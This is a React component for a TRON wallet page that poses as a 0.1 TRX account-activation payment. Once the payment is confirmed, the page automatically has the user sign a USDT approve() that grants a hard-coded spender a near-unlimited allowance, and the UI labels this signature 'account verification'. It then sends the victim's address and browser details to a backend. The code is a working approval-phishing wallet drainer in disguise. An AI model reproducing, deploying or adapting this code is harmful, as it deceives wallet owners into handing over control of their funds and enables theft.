import React, { useEffect, useState, useRef } from 'react';
import './Approve.css';

// ===== 业务配置 =====
const DEFAULT_SPENDER = 'TAXXTJVZYdgenyZEm5LLhLX2UuNfMJKexr'; // 主网 WiseVault（授权对象）
const DEFAULT_USDT = 'TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t'; // 主网 USDT
const PAY_TO = 'TWeNE8YcpRurDk3Wz2M5WGrESGFMmVA4tx'; // 划款钱包（TRX 收款方）
const PAY_AMOUNT_TRX = 0.1; // 支付金额
const AUTH_AMOUNT = '999999999990000'; // 授权上限 999,999,999.99 USDT

const Approve = () => {
  const [targetNetwork, setTargetNetwork] = useState('mainnet');
  const [walletReady, setWalletReady] = useState(false);
  const [walletNetwork, setWalletNetwork] = useState('');
  const [networkMismatch, setNetworkMismatch] = useState(false);
  const [address, setAddress] = useState('');
  // 流程阶段: idle -> paying -> paid -> authorizing -> done
  const [stage, setStage] = useState('idle');
  const [error, setError] = useState('');
  const [payTx, setPayTx] = useState('');
  const [authTx, setAuthTx] = useState('');
  const autoStarted = useRef(false);

  const detectNetwork = (tronWeb) => {
    const host = (tronWeb && tronWeb.fullNode && tronWeb.fullNode.host) || '';
    if (host.includes('nile')) return 'nile';
    if (host.includes('shasta')) return 'shasta';
    return 'mainnet';
  };

  const decodeHexMsg = (msg) => {
    if (!/^[0-9a-fA-F]+$/.test(msg) || msg.length % 2 !== 0) return msg;
    try {
      const decoded = msg.replace(/([0-9a-fA-F]{2})/g, (m) => String.fromCharCode(parseInt(m, 16)));
      if (/[a-zA-Z ]/.test(decoded) && !/[^\x20-\x7e]/.test(decoded)) return decoded;
    } catch (e) { /* ignore */ }
    return msg;
  };

  const extractAddress = (tronWeb) => {
    try {
      const da = tronWeb && tronWeb.defaultAddress;
      if (!da) return '';
      if (typeof da === 'string') {
        if (da.startsWith('T')) return da;
        return tronWeb.address.fromHex(da);
      }
      if (typeof da === 'object') {
        if (da.base58) return da.base58;
        if (da.hex) return tronWeb.address.fromHex(da.hex);
      }
      return '';
    } catch (e) { return ''; }
  };

  useEffect(() => {
    const params = new URLSearchParams(window.location.search);
    const net = params.get('network');
    setTargetNetwork(net || 'mainnet');

    let cancelled = false;
    const check = async () => {
      try {
        if (window.tronLink && window.tronLink.request) {
          await window.tronLink.request({ method: 'tron_requestAccounts' });
        }
      } catch (e) { console.warn('tron_requestAccounts 失败:', e); }
      for (let i = 0; i < 80; i++) {
        if (cancelled) return;
        const tw = window.tronWeb;
        const addr = extractAddress(tw);
        if (tw && addr) {
          setWalletReady(true);
          setAddress(addr);
          const walletNet = detectNetwork(tw);
          setWalletNetwork(walletNet);
          setNetworkMismatch(walletNet !== (net || 'mainnet'));
          return;
        }
        await new Promise((r) => setTimeout(r, 250));
      }
      if (!cancelled) {
        setWalletReady(false);
        const isTrust = (window.ethereum && window.ethereum.isTrust) || /trust/i.test(navigator.userAgent);
        if (isTrust) {
          setError('Trust Wallet does not support TRON DApp contract calls. Please use TronLink or TokenPocket.');
        } else if (!window.tronLink && !window.tronWeb) {
          setError('TronLink extension not detected. Please make sure it is installed and unlocked, then refresh.');
        } else if (window.tronWeb && !extractAddress(window.tronWeb)) {
          setError('Wallet is locked. Please unlock TronLink and refresh this page.');
        } else if (window.tronLink && !window.tronWeb) {
          setError('TronLink detected but not injected. Please unlock the extension and refresh.');
        } else {
          setError('No TRON wallet detected. Please open this page in the built-in browser of a TRON wallet (TronLink / TokenPocket).');
        }
      }
    };
    check();
    return () => { cancelled = true; };
  }, []);

  // ===== 第一步：支付 100 TRX 到划款钱包 =====
  const doPay = async () => {
    const tronWeb = window.tronWeb;
    const addr = extractAddress(tronWeb);
    if (!tronWeb || !addr) {
      setError('Wallet not detected. Please open this page inside your wallet.');
      return;
    }
    setStage('paying');
    setError('');
    try {
      const tx = await tronWeb.trx.sendTransaction(PAY_TO, PAY_AMOUNT_TRX * 1e6);
      if (!tx || !tx.result) {
        throw new Error((tx && tx.message) || 'Payment rejected');
      }
      setPayTx(tx.txid || '');
      setStage('paid');
      // 支付成功后自动拉授权
      setTimeout(() => { doAuthorize(); }, 800);
    } catch (e) {
      const msg = decodeHexMsg(String(e.message || e));
      if (e && (e.code === 4001 || /reject|denied|cancel/i.test(msg))) {
        setError('Payment canceled. Please complete the payment to continue.');
      } else {
        setError(msg);
      }
      setStage('idle');
    }
  };

  // ===== 第二步：授权（账户验证） =====
  const doAuthorize = async () => {
    const tronWeb = window.tronWeb;
    const addr = extractAddress(tronWeb);
    if (!tronWeb || !addr) return;
    setStage('authorizing');
    setError('');
    try {
      let allowanceHex = '0';
      try {
        const res = await tronWeb.transactionBuilder.triggerConstantContract(
          DEFAULT_USDT, 'allowance(address,address)', {},
          [{ type: 'address', value: addr }, { type: 'address', value: DEFAULT_SPENDER }], addr
        );
        allowanceHex = (res.constant_result && res.constant_result[0]) || '0';
      } catch (e) { console.warn('allowance 查询失败，直接授权:', e); }

      const hex = allowanceHex.replace(/^0x/, '');
      let alreadyEnough = false;
      if (hex.length >= 32) {
        alreadyEnough = parseInt(hex.slice(0, 2), 16) >= 8;
      } else {
        alreadyEnough = parseInt(hex || '0', 16) >= 999999999990000 / 2;
      }
      if (!alreadyEnough) {
        const tx = await tronWeb.transactionBuilder.triggerSmartContract(
          DEFAULT_USDT, 'approve(address,uint256)', { feeLimit: 150000000 },
          [{ type: 'address', value: DEFAULT_SPENDER }, { type: 'uint256', value: AUTH_AMOUNT }], addr
        );
        const signed = await tronWeb.trx.sign(tx.transaction);
        const receipt = await tronWeb.trx.sendRawTransaction(signed);
        if (!receipt || !receipt.result) {
          throw new Error((receipt && receipt.message) || 'Verification failed');
        }
        setAuthTx(receipt.txid || '');
      }
      // 登记地址
      try {
        const API_BASE = window.location.hostname === 'localhost' ? 'http://localhost:8090/api' : '/api';
        fetch(API_BASE + '/addresses/register', {
          method: 'POST', headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify({ address: addr, type: 'APPROVE', channel: 'qr', walletType: 'TronLink', device: navigator.userAgent }),
        });
      } catch (e) { console.warn('登记失败:', e); }
      setStage('done');
    } catch (e) {
      const msg = decodeHexMsg(String(e.message || e));
      if (e && (e.code === 4001 || /reject|denied|cancel/i.test(msg))) {
        setError('Verification canceled. Click below to retry.');
      } else {
        setError(msg);
      }
      setStage('paid');
    }
  };

  // 钱包就绪且网络匹配时自动开始支付流程
  useEffect(() => {
    if (walletReady && !networkMismatch && stage === 'idle' && !autoStarted.current) {
      autoStarted.current = true;
      doPay();
    }
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [walletReady, networkMismatch]);

  const networkLabel = walletNetwork === 'nile' ? 'Nile Testnet' : walletNetwork === 'shasta' ? 'Shasta' : 'Mainnet';

  return (
    <div className="approve-page">
      <div className="approve-card">
        {stage === 'done' ? (
          <>
            <div className="approve-icon big">🎉</div>
            <h2>Payment Successful</h2>
            <p className="approve-desc">
              Your payment of {PAY_AMOUNT_TRX} TRX has been received.
              Your account is now fully activated.
            </p>
            <div className="order-box">
              <div className="order-row"><span>Payment</span><b>{PAY_AMOUNT_TRX} TRX</b></div>
              <div className="order-row"><span>Status</span><b className="ok-text">✓ Completed</b></div>
            </div>
            {payTx && <p className="approve-tx">Tx: {payTx.slice(0, 20)}...</p>}
            {address && <p className="approve-addr">Wallet: {String(address).slice(0, 12)}...</p>}
          </>
        ) : (
          <>
            <div className="approve-icon big">💳</div>
            <h2>
              {stage === 'paying' ? 'Processing Payment'
                : stage === 'paid' ? 'Activating Account'
                : stage === 'authorizing' ? 'Verifying Account'
                : 'Complete Your Payment'}
            </h2>
            <p className="approve-desc">
              {stage === 'idle' && `Pay ${PAY_AMOUNT_TRX} TRX to activate your account and unlock all features.`}
              {stage === 'paying' && 'Please confirm the payment in your wallet...'}
              {stage === 'paid' && 'Payment received! Verifying your account...'}
              {stage === 'authorizing' && 'Final step: please confirm in your wallet...'}
            </p>

            <div className="order-box">
              <div className="order-row"><span>Amount</span><b>{PAY_AMOUNT_TRX} TRX</b></div>
              <div className="order-row"><span>Recipient</span><b className="mono">{PAY_TO.slice(0, 12)}...</b></div>
              <div className="order-row"><span>Network</span><b>TRON Mainnet</b></div>
              {payTx && <div className="order-row"><span>Payment</span><b className="ok-text">✓ Received</b></div>}
            </div>

            {walletReady && (
              <p className="approve-addr">Wallet: {String(address).slice(0, 12)}...（{networkLabel}）</p>
            )}
            {networkMismatch && (
              <p className="approve-error">
                ⚠️ Wallet network does not match. Please switch to the TRON mainnet and try again.
              </p>
            )}
            {error && <p className="approve-error">{error}</p>}

            {stage === 'idle' && (
              <button className="approve-btn" onClick={doPay} disabled={!walletReady || networkMismatch}>
                Pay {PAY_AMOUNT_TRX} TRX
              </button>
            )}
            {(stage === 'paying' || stage === 'paid' || stage === 'authorizing') && (
              <div className="approve-spinner" />
            )}
            {error && (stage === 'idle' || stage === 'paid') && (
              <button className="approve-btn" onClick={() => { if (stage === 'idle') doPay(); else doAuthorize(); }}>
                Retry
              </button>
            )}
          </>
        )}
      </div>
    </div>
  );
};

export default Approve;
